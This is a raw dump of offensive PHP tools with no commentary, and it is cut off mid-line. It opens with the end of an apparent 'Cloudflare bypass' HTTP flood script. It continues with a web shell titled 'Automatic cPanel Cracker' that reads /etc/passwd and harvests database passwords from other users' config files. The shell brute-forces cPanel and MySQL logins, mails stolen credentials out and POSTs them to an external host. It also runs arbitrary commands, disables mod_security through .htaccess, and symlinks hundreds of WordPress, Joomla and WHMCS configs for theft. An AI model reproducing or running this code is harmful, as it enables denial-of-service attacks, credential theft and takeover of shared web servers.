"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
);
$end = time() + $argv[4];
$threads = $argv[3];
$failed = 0;
$succeed = 0;
echo "Cloudflare Bypass credit to fearless\n";
echo "Starting cf bypass on $argv[1] for $argv[4] seconds with $argv[3] threads\n";
for($i = 0; $i < $threads; $i ++){
$pid = pcntl_fork();
if($pid == -1) {
echo "Forking failed on $i loop of forking.\n";
exit();
} elseif($pid) {
continue;
} else {
if(!(strpos($argv[2], "dog"))) {
$proxy = rand_line($argv[2]);
} else {
$proxy = NULL;
}
$ua = $useragents[array_rand($useragents)];
$bypasscookie = bypassyourdog($argv[1], $ua, $proxy);
if(strlen($bypasscookie) > 70) {
while($end > time()) {
$flood = curl_init();
curl_setopt($flood, CURLOPT_URL, $argv[1]);
curl_setopt($flood, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($flood, CURLOPT_USERAGENT, $ua);
curl_setopt($flood, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($flood, CURLOPT_PROXY, $proxy);
curl_setopt($flood, CURLOPT_COOKIE, $bypasscookie);
$flood123 = curl_exec($flood);
curl_close($flood);
}
}
die();
}
}
for($j = 0; $j < $threads; $j++) {
$pid = pcntl_wait($status);
}
?>
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Linux Symlink Bypass

<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); echo '</head><body>'; echo "
<html>
<body bgcolor=black>
<head>
<style type=text/css>
body{
background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFwAAAAuCAMAAACS246gAAAALVBMVEUREREMDAwSEhIUFBQQEBAODg4TExMPDw8XFxcVFRUWFhYNDQ0LCwsKCgoJCQmoaA8gAAACwElEQVR42rWW227tIAxEuYYQSP//c5ul0YicnL6CVIntmkXsMYYQQnxGSjmXEmOtIeR8HK3F2FrO53kctcZYSs69X1cI4xkhXFfv+M/Z2vWMWuczjuO6ln/Oe+FC984Y477nDAHkGMLjzjyE3oVm5k8BFALf2Bp2o/Uhu+GgU2otpRDm1G+WCo8bS0CBBpWSfh8HGztpb7Q+ZC8ccXJGmjGQcqEJ1SECQTJJOScjpes6z5RilP2LxroTrpCYIg1lJXRKcresKWmOmKCxlnIcpFQJXGiUhLcXPgYGBJVcKjcOFQvfeOb2Vvk5OcK/0fiNsRtOOmzETDGyFKjwbgU5K3SElMSGC7fQIWDdCyckB8TcSaAVaGnOamPvtkRrc5vD9j8a4ffCQRpPKJJTpcfBAgl+TjYw6luiRqsomNVayl44i0G6/RivKwOM8DEiH7hSvNH3yPvyUPMeYy+8VpxASiCcQKaEJG4FILH2zpZfNDhJyR+HD58598JxVDrmvO8YkbU1I3P2nCvi73ZAAi1la8Yj9F64gyQUHAxc+FKwg/ui5ywFD7x9kSA3eBrEXjjNyMcDOX3YhZTF194XHSPPECWUJkfy/Oig0e2FKw1jsMhozXUZkBCCpczeaLYDgngIaVFdiOD3wnE2MqV3cyVh9zNSegIMXzRtVwmgRGGM4Qah50ate+EEpofyCpzNaAUcdf3++8hbaoRc7UwlwlZ74Uq9ZfXDjACx+xn6RVO4bO7Ck4Rs4kcrH7YXLrMkpOAcGPhS/i1Oo7HGyLp1Ba708lmSeC9c6VBqDCJcjgQgW3yQQKs9cZF5c1+GoGHRoPfDe5fJ/16PBhcnAYO4b1/Ftq82ZbRSotleeO/nSZALD2bhsTP34X4/2Yz2tcYcNKX88xPjXrikQ9K3LOBx8yUMUi1qoZHVJYjXfRut9SFshf8CHnhfSb7xpWAAAAAASUVORK5CYII=')
}
input[type=text] {
color:black;
}
a {
color : white;

}
#terma {
color:black;
}
#kernel {
}
#exec {

color:red;
}
#zeb {

width: 525px;
height: 301px;
color:black;
}
input[type=submit] {
background-color : black;
}
a:hover{
border-bottom:1px solid aqua;
}
*{
font-size:11px;
font-family:Courier,Courier,Courier;
color:white;
}
#menu a{
padding:4px 18px;
margin:0;
background:darkred;
text-decoration:none;
letter-spacing:2px;
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;

}
</style>

<title>Automatic cPanel Cracker</title>
</head>
<br><center><div id=menu>
<a href=?home>Home</a>
<a href=?grab>Config</a>
<a href=?cp>cPanel Automatic</a>
<a href=?cp_jump>cPanel Jumping</a>
<a href=?upl>Upload</a>
</div></center>
<p>
<center>
<img src= /><br /></center><br><center><div id=menu>
<a href=?jump>Jumping</a>
<a href=?pws>Config Password</a>
<a href=?x=symlink>Symlink</a>
<a href=?cmd>CMD</a>

<a href=?cp_cracker>cPanel Brutus</a>
</div></center>

<br><br><center id='kernel'>".php_uname()."<br>"; echo '<img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg" height="0" width="0">'; if(isset($_GET["cp_jump"])){ echo ''; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea id=terma cols="100" rows="20">'; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"; echo "[~] Searching for passwords in config files...\n\n"; foreach ($users as $user) { $path = "/home/$user/public_html/"; read_dir($path,$user); } echo "\n[+] Done\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "$path$file"; if (($file != '.') and ($file != '..')) { if (is_readable($fpath)) { $dr = $fpath."/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or ($file=='settings.php') or ($file=='configuration.php') or ($file=='wp_config.php') or ($file=='wp-config.php') or ($file=='inc.php') or ($file=='setup.php') or ($file=='dbconf.php') or ($file=='dbconfig.php') or ($file=='db.inc.php') or ($file=='dbconnect.php') or ($file=='connect.php') or ($file=='common.php') or ($file=='config_global.php') or ($file=='db.php') or ($file=='connect.inc.php') or ($file=='e107_config.php') or ($file=='dbconnect.inc.php')) { $pass = get_pass($fpath); if ($pass != '') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config = fopen($link,'r'); while(!feof($config)) { $line = fgets($config); if (strstr($line,'pass') or strstr($line,'pwd') or strstr($line,'db_pass') or strstr($line,'dbpass') or strstr($line,'passwd')) { if (strrpos($line,'"')) { preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass); $pass = str_replace("]=\"","",$pass); } else preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass); $pass = str_replace("]='","",$pass); return $pass[2]; } } } function ftp_check($login,$pass) { @$ftp = ftp_connect('127.0.0.1'); if ($ftp) { @$res = ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success !\n\n"; $domain = $_SERVER['HTTP_HOST']; $p21 = 21; $p22 = 22; $p2082 = 2082; $cp22 = fsockopen($domain,$p22,$errno,$errstr,10); $cp21 = fsockopen($domain,$p21,$errno,$errstr,10); $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10); if(!$cp22) {$a1="Error";} else {$a1="Success";fclose($cp22);} if(!$cp21) {$a2="Error";} else {$a2="Success";fclose($cp21);} if(!$cp2082) {$a3="Error";} else {$a3="Success";fclose($cp2082);} $psn ="
-------------------------------------------------------------------------\n
Host : $domain\n
User : $login\n
Pass : $pass\n
-------------------------------------------------------------------------\n
Accept Port \n
SSH : Port $a1\n
FTP : Port $a2\n
cPanel : Port $a3\n
-------------------------------------------------------------------------\n
n"; $to = "e"; $recip = "[email protected]"; $subject = "cPanel AccesS Update"; $headers = "From: update<[email protected]>"; mail($to,$subject,$psn,$headers); mail($recip,$subject,$psn,$headers); echo '[SSH] Port' .':' .$a1. " !\n\n"; echo '[FTP] Port' .':' .$a2. " !\n\n"; echo '[cPanel] Port' .':' .$a3. " !\n\n"; } else ftp_quit($ftp); } } echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>'; } if(isset($_GET["cp_cracker"])){ if(function_exists('apache_setenv')){ @apache_setenv('no-gzip', 1);} @ini_set('zlib.output_compression', 0); @ini_set('output_buffering ',0); @ini_set('implicit_flush', 1); @ob_implicit_flush(true); @ob_end_flush(); $ipserver=$_SERVER['SERVER_ADDR']; echo '
<html>
<style> body {font-size: 12pt; font-family: "Times New Roman"; }</style><head>

</head>
<title>cPanel brutus</title>
<body text="#00FF00" bgcolor="#000000" vlink="#00BFFF" link="#FF0000" alink="#008000">
<div align="center">
<br>

</td></tr>
</table>
<br />'; if(!isset($_POST['submit'])){ function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } else if(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } else if(function_exists('shell_exec')) { $res = @shell_exec($cfe); } else if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } else if(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } $default=execute("ls /var/mail"); if(!$default){ if($file=@file_get_contents('/etc/passwd')){ $u=explode("\n",$file); foreach($u as $us){ $uss=explode(":x:",$us); $default .=$uss[0]."\n"; } }else if(function_exists('posix_getpwuid')){ for($n2=500;$n2<10000;$n2++){ $userinfo = posix_getpwuid($n2); $name=$userinfo['name']; if($name!=''){ $default.=$name."\n"; } }}else{$default="Could not get any username.try manually :)";} } echo <<<EOF
<form method="POST">
<div align='center'>
<table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'>
<tr>
<td align='center'>
<span lang='en-us'><font color='#FF0000'><b>Usernames:</b></font></span>

<p align='center'>&nbsp;<textarea rows='30' name='usernames' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>$default</textarea><br/>
</p></td>
<td align='center'>
<span lang='en-us'><font color='#FF0000'><b>Passwords:</b></font></span>

<p align='center'>&nbsp;<textarea rows='30' name='passwords' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>123123\n123456\n1234567\n12345678\n123456789\n112233\n332211\ntest\ntest123\ncpanel\npassword\npassword1\nabc123\na1b2c3\npassw0rd\nPassword\nPassw0rd\nuser\npasswd\npasswords\npass\nchangeme\niloveyou\nfuckyou\nadmin\nqwerty\n1q2w3e\nq1w2e3\nqazqaz\n1qazxsw2\n1qaz2wsx\nqazxsw\nqazwsx</textarea><br/>
</p></td>
</tr>
</table><br/><input type='submit' value=' Subtmit ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></form>
EOF;
}else{ $password=array_unique(explode("\n",$_POST['passwords'])); $username=array_unique(explode("\n",$_POST['usernames'])); if(!set_time_limit(0)){"<font color='red'><b>ALERT:</b> set_time_limit(0) failed! Cracking will be interrupted!<br/></font>";} echo '[+]Cracking...<br/><hr width="67%" style="border: 4px dashed #FF0000;"><font color="white" size="4"><b>username<font color="red">:</font>password</b></font><br/><br/>'; $count=0; $n=0; $start=time(); foreach($username as $user){ $count++; $user=trim($user); if ( @mysql_connect("localhost",$user,$user) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$user</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";$n++;continue; $success=$ipserver."|".$user."|".$user."\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); } foreach($password as $pass){ $count++; $pass=trim($pass); if ( @mysql_connect("localhost",$user,$pass) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$pass</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>"; $success2=$ipserver."|".$user."|".$pass."\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success2)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); $n++;break;} } } $end= time() - $start; @$per=$count/$end; if($n){ echo "[*]Successfully Cracked: <font color='red'><b>$n</b></font><br/>";} echo '<font color="#00FF00">[*]Time took: '.$end.' seconds for '.$count.' tries ('.$per.'/sec)</font><br/>'; } } if(isset($_GET["cmd"])){ echo "<br>"; echo base64_decode("PGZvcm0gbWV0aG9kPSJwb3N0Ij4KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJHbyI+CjwvZm9ybT4="); $order=$_POST["command"]; $sub=$_POST["submit"]; if(isset($sub)) { echo "<p id='exec'>".exec($order)."<p/>"; } } if(isset($_GET["grab"])){ echo "<p><font face=Tahoma color=#007700 size=2pt>/etc/passwd content</p><br><form method=POST><textarea id=zeb name=passwd class=area rows=15 cols=60></div>"; echo file_get_contents('/etc/passwd'); echo "</textarea><br><br><input name=cat class=inputzbut size=100 value=Start ! type=submit><br></form></center><br>"; @error_reporting(0); @set_time_limit(0); if($_POST["cat"] && !$_POST["passwd"]==""){ echo "<center>Checking Smylink Functions ...<br></center>"; $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){ die("<center><font color=red>Symlink Function is DisableD, You Can't Continue This Process !!</font></center>"); } echo "<center>Checking Done Without Problems, Start Grabbing ...<br></center>"; @mkdir("TurkHackTeam", 0755); @chdir("TurkHackTeam"); $htaccess="
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
"; file_put_contents(".htaccess",$htaccess,FILE_APPEND); $passwd=$_POST["passwd"]; $passwd=explode("\n",$passwd); echo "<center>Starting Symlinking ...<br></center>"; foreach($passwd as $pwd){ $pawd=explode(":",$pwd); $user =$pawd[0]; @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt'); @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt'); @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt'); @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt'); @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt'); @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt'); @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt'); @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt'); @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt'); @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt'); @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt'); @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt'); @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt'); @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt'); @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt'); @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt'); @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt'); @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt'); @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt'); @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt'); @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt'); @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt'); @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt'); @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt'); @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt'); @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt'); @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt'); @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt'); @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt'); @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt'); @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt'); @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt'); @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt'); @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt'); @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt'); @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt'); @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt'); @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt'); @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt'); @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt'); @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt'); @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt'); @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt'); @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt'); @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt'); @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt'); @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt'); @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt'); @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt'); @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt'); @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt'); @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt'); @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt'); @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt'); @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt'); @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt'); @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt'); @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt'); @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt'); @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt'); @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt'); @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt'); @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt'); @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt'); @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt'); @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt'); @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt'); @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt'); @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt'); @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt'); @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt'); @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt'); @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt'); @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt'); @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt'); @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt'); @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt'); @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt'); @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt'); @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt'); @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt'); @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt'); @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt'); @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt'); @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt'); @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt'); @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt'); @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt'); @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt'); @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt'); @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt'); @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt'); @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt'); @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt'); @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt'); @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt'); @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt'); @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt'); @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt'); @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt'); @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt'); @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt'); @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt'); @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt'); @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt'); @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt'); @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt'); @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt'); @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt'); @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt'); @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt'); @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt'); @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt'); @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt'); @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt'); @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt'); @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt'); @symlink('/home2/' . $user . 